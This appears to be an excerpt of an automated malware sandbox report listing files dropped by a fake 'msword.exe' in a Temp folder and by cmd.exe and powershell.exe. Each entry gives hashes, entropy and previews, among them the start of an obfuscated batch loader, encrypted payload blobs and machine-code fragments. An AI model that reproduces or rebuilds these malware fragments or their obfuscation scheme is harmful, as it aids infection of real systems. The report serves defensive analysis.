                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.5./.0.1./.2.0.2.5. . .0.2.:.5.6.:.1.7. .=.=.=.....
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:ASCII text, with very long lines (1646), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30641
                                      Entropy (8bit):5.0857625939320155
                                      Encrypted:false
                                      SSDEEP:768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
                                      MD5:971CB890AC9F35B6105DE0EB33095730
                                      SHA1:D113B90F9219237A611A8EE03040682DDBD93CE1
                                      SHA-256:CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
                                      SHA-512:8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
                                      Malicious:false
                                      Preview:Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (1646), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30641
                                      Entropy (8bit):5.0857625939320155
                                      Encrypted:false
                                      SSDEEP:768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
                                      MD5:971CB890AC9F35B6105DE0EB33095730
                                      SHA1:D113B90F9219237A611A8EE03040682DDBD93CE1
                                      SHA-256:CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
                                      SHA-512:8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
                                      Malicious:false
                                      Preview:Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46380
                                      Entropy (8bit):7.996032413296538
                                      Encrypted:true
                                      SSDEEP:768:uG8mNPfvXXy+dsh2M+5PmQ7RY4wl/lIZZ7MW7ZkmYGfKhn8jzchmbDQ:78mNPycMePvKV/qZZPiGKABbDQ
                                      MD5:D4B3ADC8CBB57EAB0BF606DB6A43E118
                                      SHA1:356174D53E6491026EB1AC8EBCEF4CF718BCE17B
                                      SHA-256:85ACB62961BFFD09D7B492CE0F6D127E67A80E874BD66F3E50BB02B4BBBF6E16
                                      SHA-512:EAD4144CE24F579C7F0E5055620257674D907F5BBD3A65868847421675985C7D81422D9076F2FBD901CEC6835C81035D464916D8E94A0CE3C9C8014C0C3DFD01
                                      Malicious:false
                                      Preview:.A...._.WLB....).=NW...i.NWmV.J.k..L.F8....h..G..4..:..av{=..M1......)GJ.q..........iT..\}.$..|..)...31....P<..L.....~.z.....s;.k...BJ..A.m.u....Ad.%.h..K..X...lsU...`....MqJ.;5.W{".VA.H;.s.6..ql.1]..i.KM..K.K..ZzZ.f...8.qQ?-.P..y..l....t..y..'...3.XkU.. ..zxEN.2;t..."....~.b.Qe]}jRMt9...|.a..A.2..cG.....m.H+.P'..O.".K.Kx)e..e..[...b.a...e....D[...Y...cXE.A..1j.\.....7..jj..........v.y.......#. ..p....[...A..=.t..J..!Q....e:..8o....'h*.....z1.........Vw./r8...h....L.-..C.!...."./.......`(m>.;..I..O(].R.8. M.f.|..t5.......)..`%/Bx...O...A...p......1..B....8.......H.(....?.T...k..V.Y?m.:#....M..<G,-.K.p./.{..z.-M..+@..c......j.>MALy.A.,..H.x...4]..M.=b.[N......E.........G7.H}.Es.G.......y....|(.%...b..+.x.Q...r0=R..9....#.......8-.f...3....,.....;U....3...,....a.0".U.C1.g0s|.>..@G.}.C%....~..+..j.)...nm.._..)N.D...........t^.9.kE6y...%..&.VC..}.xs.0...|.eh R.d9g.......T...dMn"..f!1q.wd.Ra%t..;I...\..e...4m...b..K.?3..05...e..-....X.$....
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):151552
                                      Entropy (8bit):5.35483837732914
                                      Encrypted:false
                                      SSDEEP:1536:iKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmo:86whxjgarB/5elDWy4ZNoGmo
                                      MD5:ACAC13DC82CE749F727F0C81BA5FDC73
                                      SHA1:5350FE77594467906A5251B8C2248CD81D15D8E2
                                      SHA-256:B6A35AC20BAED2784E793E577670B5AE1062890CB9BC4D931A9F0BC874B2A612
                                      SHA-512:C86B8DD695DAE4626631AF41497C73250A73967E28A9F3472F2D344C4FF2F7FBAF9101FBD5EC45124537DF823951C5E09FE0696488AD599D6AFA77DDB918364F
                                      Malicious:false
                                      Preview:.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.!.!.!.!.!.!.!.r.r.r.r.r.r.r.r.r.r.r.r...........r.r.r.r.r.........................)...........................r...........r...r.....r.....r.........................................................................................................................................................................................................................*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):72704
                                      Entropy (8bit):7.99766272586728
                                      Encrypted:true
                                      SSDEEP:1536:rY1/zHVTJE2KI6zH3+Te0hDcnNsoExtf4Ahg/IdAGIrYJy6B8:rEbVTJxKlzH3we0aA74cIYJG
                                      MD5:2C4CFD8A5B0E70B3B8E872FC1091C9CA
                                      SHA1:2C6C8DC12CA41DA972D3B393129506C9B9CBA0CD
                                      SHA-256:E7051EC0A2700737D0C85441EF433D0041451623346D2933F4AD602C88C83BDE
                                      SHA-512:19E74E8777D5FB850CECF1E95219F7EBC8648C29A24647B72CE94A5E1286CA3FCFFA9FD8AD19F689B1A3466A109DAFBA2D10DBC85FDC1610FC0716CE4018174E
                                      Malicious:false
                                      Preview:.....,`.L..`.$.\F.|.9$......|.?.'UB..Z.p.......7.7.k.).1.S.Mu..#...; ejR.z...Y.}.H..NuT..N...L.!.u.$.`fW..M.L$d`..'.%......6..1.<.Q.]..Q.2..??bH........D..T..|~."W..1.+ck.5h....a...[.?~...6..%.$$d*Q.\..j.ho+.........7......e....p..\Mh"...#{u..F..*.?.....]#.s?....[.A..~^....|^+......]..b.........+](..%...`....j-....&y.Zm.j[...`=S..K..Wg@ebB.7Fb.K...\I/...Y.....@.8E.e...'8.}v.7..z..S.#@...`D..mh6i..L...$..9...Ay.N.'YR.r#......."Q..3...x_..r......\.....;......`...$\BH.....>l"gg..Q.e........S.Y.[e"... .{.}..M6..V.(v.....>.<AY.Ih......$...(0...J.Q.L.IT.:3<S...y.M.$..,.#..IX."....K...yE./>.6.......M[.I3.3|r.7.v...R.&.GR ...?..%.mn....R.......~.....v.... `N...DB....... ..u..::P....R...8..I....."....f1.......@bk....[.D"..;*..i.......a...3......k4~........o..3...D..,...O.>.p..n.!.~'?In.J.3.cdQ.......cD...B&.....x......6...@...^u$.3....~z...Z..`.B...f..K....d.aYy...d...M..P..(.W6...,Z2.:.)....l.E'..D......C.8.S...E.j...N3.j..|...a..z...bJ..@
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):68608
                                      Entropy (8bit):7.997800401356153
                                      Encrypted:true
                                      SSDEEP:1536:elqGCsW9l+3prMB5cOkKl+9yib0wRGnqJpxQbEvleUtqrc3HxO:eHCsW9KlMCsBib0wRzybHURO
                                      MD5:49EFDFC03CCDA219825C385B3B35FB43
                                      SHA1:CB1B3E7C95E0C457DE0A8879073301B44A12FA3A
                                      SHA-256:F98C5BCC2A2A7ABDC448A2C048326AED45A9A914A2AB3EA4D1BA4ADA7D810144
                                      SHA-512:560FE3EE3F80850EB5D6813327D165AF384B31691D35694C4E4385F5B0BB895747042D97D4F63C9FA611ACA0A642924CF9DEAD30EC035EEE62A87FDDBCD1B8F4
                                      Malicious:false
                                      Preview:....a.W....>.2<1?..i..5.wapA...K1.x^[.$F.._..+ZlT.yk..8/..f:...\P```.......I@pXOx)].........0.....!.....R;N).M.i.:....]...QbAQ..;..X..k..fj..Fh....3[.....D..!..nt..s..v...M|~..(..Y-O.[91....G.ne.e.#9.X...0.......h>.6....y..M{&..`.{ ..B.DR7h.9.......K<".9..X.Jb0w.-..@.|....7e.+.Y^w.3....)-........VmM....<MR.V..Hc..<.e7..G.R.mG......../..d.|R#.>87$....S..R.~.2..j,..b.....r......e(..7"..3.R....h...J...J9.l.......27V.E.0rg.)%.t..T(....k.\.....x......Zw.".?.]?._.Y..z.IG.".b.w.4.GX.w..n..9}.=.......-..@.Q.Z...-........f/.5..(....D.....j..i%;.v.k}.J8.l...>.dl.|..cE..8@=....\..4...*.'..}...M...Ze..%.<%lk.....O..!?.l..,.t..Z.a.....6..S6kD.%...e............U...Z..8..cG-Q.=.AQF..F.s....B..=x:.s&.*.A8CC....^...3/n..R..YO ...^.l...=.~.d.a.1..7....'.:$..H:1..3Z=..4MH.LR&+}M..........V[....!.....v.v..{.9.%....>Hu...P..Av.$l.7........1;...~...BN..!.1.*.........JI#...l=.......Q.).`...e..J.q...=..E..7'!...b..~L.`.:.Y..........|.......c.?..s&....e.<.......
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):37009
                                      Entropy (8bit):7.161342216267482
                                      Encrypted:false
                                      SSDEEP:768:E9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:EATGODv7xvTphAiPChgZ2kOE6
                                      MD5:54C230191C78CF10807F0D4EAA561CBF
                                      SHA1:70A2B2019668F5BB8C3D58C64EEB34C9907B55E6
                                      SHA-256:A656398863A57CA942F748B9A697DE3217C0E1843679D1E8D6C8AC98F8C1E02A
                                      SHA-512:3F195D1212295BE976285DF384612F26E174E1F2DE679B209EF8861999E430DE13EA6E3DEC8747F4DDF227F44DFEB2A6112D137CB208572C5EF9B4F2D42502DF
                                      Malicious:false
                                      Preview:3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4 4$4*4.444>4H4R4]4e4i4o4s4y4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5!5,54585>5B5H5R5\5f5q5y5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6!6+656@6H6L6R6V6\6f6p6z6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7!7%7+757?7I7T7\7`7f7j7p7z7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8#8+8/85898?8I8S8]8h8p8t8z8~8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9"9,979?9C9I9M9S9]9g9q9|9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:":,:6:@:K:S:W:]:a:g:q:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;";&;,;0;6;@;J;T;_;g;k;q;u;{;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<#<.<6<:<@<D<J<T<^<h<s<{<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=#=-=7=B=J=N=T=X=^=h=r=|=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>#>'>->7>A>K>V>^>b>h>l>r>|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?%?-?1?7?;?A?K?U?_?j?r?v?|?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...@..8....0.0.0.0.0$0.090A0E0K0O0U0_0i0s0~0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1.1$1.181B1M1U1Y1_1c1i1s1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2$2(2.22282B2L2V2a2i2m
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):77824
                                      Entropy (8bit):6.68140784602293
                                      Encrypted:false
                                      SSDEEP:1536:9U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI93s:9UDQWf05mjccBiqXvpgF4qv+3s
                                      MD5:E5F5603745AC7E491627F61F770384E1
                                      SHA1:71B49644F3C8659C075CFA4CFDDBA22588131FB1
                                      SHA-256:9706522D1D008FE36CC3D7BB32A3C33B18530BA86A7E5E557B0D95ECE20BE281
                                      SHA-512:6D84B641C97BF6DD3C075EB59803D97483E3167D1D72871BE14B1F9519751D6A74AC973BF9E50D5A3D5A7B954DC939A8063DD91EA1123581170053C48D9C5237
                                      Malicious:false
                                      Preview:.3.M.............e...........Y...3.P.u(..`....u P..H...P..d...P......P.E$..U.PS.u.E.Q.u..M.P......4...._....M(......]..IX;........E......;............;.........`....u.j)Zf9........},........U..U.........B....M...|....M..M..M..M..M.M.3..\........;..d.....O....}.........................H....]...D...3..u..u(.M.P.u..v@S....3.....9...v.......w....M...u..G....w.....M.E..E..E..M..M...|....E...........................j.X;.......j.X;........M.....3...j.X;...(...;... .....j.X;...&...j.Y.G.;.K ..+K.....#U..}...U.M..."....U.j.^f.:..U......j]Xf9F........ ....M..M....|....M..M..M.;...%.......E...l....E.;...(....U......],.......t.....+.G.;.......j.Y.G...U....jxXf....f....f.....@...U....SV.u......W.}...U.M.;........E.3.M.........%.....E........u.;.w/.}...+.A..M.............:...F..:;.v.u..}..E.......w......;........E._^[..U..V.u.W..t...9N....I.Bf;.t......H_^].3...U.......SVW....1L...3.}.B..A.......;.......jw[..>..j.Y..}........u...........f;.......@f;............f;........
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):89088
                                      Entropy (8bit):7.998187805046269
                                      Encrypted:true
                                      SSDEEP:1536:KSaJEMoNVX8cEynrHSHmrTLT8SJj9PEv/61VZApRnWEmx/4gzVja:4vozi0rZ3Jp8nWkRnTy/Ra
                                      MD5:5EBB42ADED1C56715BA1EC98BC2638F1
                                      SHA1:9B3AD86BE972BC59ECF45C249FD38A4DFD762FFF
                                      SHA-256:D302B56F0FABFB24855D94C90BBDD829837B8FA85B1C6777CF2E20B5526BB602
                                      SHA-512:256645AC47FE31AA2147906BC5A53BA328F288E20D44ADCD0ADFF9E386DDDF63A8C9A161D675F35E56443985A6D811F0FED2F48C526A17C0923B6653D4EE2CA5
                                      Malicious:false
                                      Preview:....R...e.".>..?.%R;<..2.....E....*.6.P.?...<{......p..B....K..$...T....83H...JD.....CX...[Z.m.h/.]...+e.&..h.....y..............4x.)...{..E"........6..s>#{.%C..t.E.C...{6..........G.x.|..........>w..9.9......F..K9..?..w...'Npv....x?u.\\...O.=.....1.y..*....^......b].(....5.sk..G..B%..s.6...P...U...K.D.{.Fp.?9.fl_.{.`...'.......PN.#.....5...D......u....?.m..\..G...HM7u.....K}...;.M.]..E.`..!X.i....j..s_nX.W....^..*.6.K;...BZ...2..)I}.?...0..h..).0.s..%Tr...~...kC.JZ.n:...c..X..yUAB.Xj..N..|......l8.V(0e..Ml.iG...7...m.6..kX..kZ....y/<..^..1.F...t.....U0...,.1.p...1../.Z...A.>.....F..Ow.^.. .0...V.m.........Nl...xy.V.................ic.+...k..^......C.y...I..hg...a..y8B*.........O...b.1...C}...M.VT. .....@.l,...H.7..y....1.......\T..81%..9.s/..M..F.I.c,. .\.,M@=.tb.wy..O...O..g.,*.9.I......R~...$.....(f....7..~T../l..y........,S.MmbT.<.$J.k...`.........'..oV.4.)KW.-.3q...ypE]....<..'..A......b4..IUH4`.N.......Rz..^...S..t.m.i....7./.ze
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):75776
                                      Entropy (8bit):7.997337841606491
                                      Encrypted:true
                                      SSDEEP:1536:YFpYViuJWu7d6d6xm/8PleBlivu2/a3gvGUttQue1:YDYsuvS8PBvu2bu791
                                      MD5:86BDDDBF60A6B1CE21D695171B5B50A7
                                      SHA1:3EDCC074129F105DB4EAD779D08BE20D6812EE15
                                      SHA-256:A3A5647BB284F7F395407A00D9EFAEACF0D54C8E79FBA8BC28FE826183F24EAA
                                      SHA-512:26657048694FB307E80BBE91964BF4DFEBAFD0729669CD9F2290C7E139EC1CE21C3410CEBA3B7C2F0CE3A4DBF57BFB62248670DC9CB9CCCE3BAF1096E484C27D
                                      Malicious:false
                                      Preview:A...../"..}....X...2u.).)...8.n.O..+......JG....z..U..y....g...(...NJ...+j..y...g.ar.R..~........!5..^ .<......(...K...@..5..#..w.@,9..d.1.\^...E...^...g.zxTbi.i-y...{;a..3.e...N]a`}..q.Q.....Mt...Y.Tz...;...?v......C.k..*fZg.\...4I....>i..`:..Q&....1.g..c........M..'....'.O....F ..W..J.....2.U.x..Z}.o..*...9.x........6..Q...M|*F=..@...pV...F.HwE.?.&...`b.j...c.8|.l..Kp.%)].F...-...q......z.=...A&..s..7..F..2..R.........-..#N..q..M...(I...H...r@.-P...0.&...[.$.v......|..6....xFp..gR..u|....L.l..II.H.g.^+K.v.....9..x...P&(n.l.W.[.J.LoE'.*. ....T._...|W.g..$.q)..e.q..=.<..J6....,A&..=.J.9S...,8+e-zL...../qM.2G...)....4. ...e...v...mu,#.>..._.%m.....0.......z..*Yf;n.H.3...'.....~H.x..0...u...V..).L..o..x.q(..!F.J.).Ht.q..o.!..>A..NR..M.b.u.7......Q4.3..p...kR&t......Gp..C.. .6...'4B...;7......Kh1S...m.t..mfR.+.....sB#Z.....>z.'......|.@yg.....pa.3.s....=....f.....Uq...V..,:Z(.GJ6.-d..n.....CF}i.?...........M.I ....d..U..-.R..9.#H......>.M.SL.
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):130048
                                      Entropy (8bit):6.658223104333049
                                      Encrypted:false
                                      SSDEEP:3072:Z0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBZ:QbfSCOMVIPPL/sZ7HS3zk
                                      MD5:5CD6AF8D1D071C54D081DF22F7D057AB
                                      SHA1:330782E2FCEB552E894643FDC40AFFADD187044E
                                      SHA-256:BCFBF03BFE8181B81F3A1FF2D3774233CE013596FB3F4F535819FC422B696CEE
                                      SHA-512:4F6CB5F41F5D338B998A075C532EB500806463C14FB9AB0B3945CA5AA24CC2DDD12F3D0E02D91FEF513AA3602A9E29CF69ABBE12181BA625DFC7F0E325F3D6F7
                                      Malicious:false
                                      Preview:......L...A;.v.....8.u.F.........@...u..v...............^....~.3..~........9=."M.t.V................h.....F.WP.qV.....kE.0.E.....L..E.8...t5.A...t+..............s.....L..D..B..A.;.v....9.u.E.G....E...r.S.^..F....................E..N.j.....L._f...R.f...I....u.V.....Y3._.M.^3.[..=....].....I..."M.....I..."M.....U..U.W3.f9:t!V..q.f.....f;.u.+.....J...f9:u.^.B._]..U..QSVW....I...3...tVV....YWWW..W+...SVWW....I..E...t4P..j....Y..t.3.PP.u.WSVPP....I...t...3...3.W.[..Y.....t.V....I._^..[..]..VW....I.....u.3..7SV.+...+......S.i....YY..t.SVW.?.....j..6[..YV....I.[.._^..U....S.]...u..$$............|VWj=S...S...E.YY..tN;.tJ.x...5..M.....E.;5..M.u.V........E.Y.5..M.3........9].t/9...M.t'..N....un.#...........W.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M..
                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.996808997159829
                                      Encrypted:true
                                      SSDEEP:1536:v8HYZV3DRdZOzj3zNzH65bsZj94bitw+XZ/VCuc:3SzFbaoH1/VCd
                                      MD5:01E51A0D2AC4E232BB483444EC14F156
                                      SHA1:8DB19310817378BCF4F59F7E6E8AC65E3BAD8E2F
                                      SHA-256:27D2E36B97DBA2657D797098D919F7C76893713537FF4ABA5F38CB48BC542EF9
                                      SHA-512:C982A98AE76F1DC6459F868C9F7B79D9CD3372C2045FD10FA1A876EC03367F77E4BE9CCD27BBEAEB58E8C3C06E838A7DE44057069F8CF1E7925CEA14397E0962
                                      Malicious:false
                                      Preview:...0.p;...Z...W.aM..:.3p3...^6.@!...R.G..9......S...)`G...<\..X..y.$D.4.>m..c>....)S)...Q.gxuw......+......?e.i..7)...u...$.....&..g.....rwZ......M.2.`...@.?<..l..m..-.}_..P3..........|..~|)(k...Cc.N.J...i.H..[S(...d.......n2zst.A...[V2x.[.........L...\ut..x(.5'j.W..t..N..W.`7..D.j.?...R..27.M..elZ...e.(!,K...J.;Fw.V.g.]-..C.-.n8Au....|U..D$.]....h..0.l....W..-..E>Q,.?..v.q....0.....L..R.39uH.I.6..:. ..j...$$QW.#..m1.....4..=v...`1.M..f.....XL....R...M..*x....P..S...'.G..6..^.+S.H.x...|.%B....]...+.!81$C..uI...w...S....>.gz....V.|.K..j..W{...a...-\.n...t0L../.w.:Q...(V.(]......RSs@.O.........vNB..U`v.C.....<H.}.WE....g{v.......Aq.l....<D.3..c^..#.@.w.9f..78t5l..]..%..AUCT.=.s.=.}..m....wr.W..7==..9.L.~..b~}^....a...F....Q.0>fH.....Y....s....?..!.e..!.3..R.S8.fY.......?..6l..;p+T.4...f|..sor.e*......x..lP.U..<.........k...B.,..H.*./....qY..... ..R0Xn..ygP.%..B..m."D.5..).8.wh.=..Y.D.......7...d:.sz.{.R.)m..~...i;.......s.*9D
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
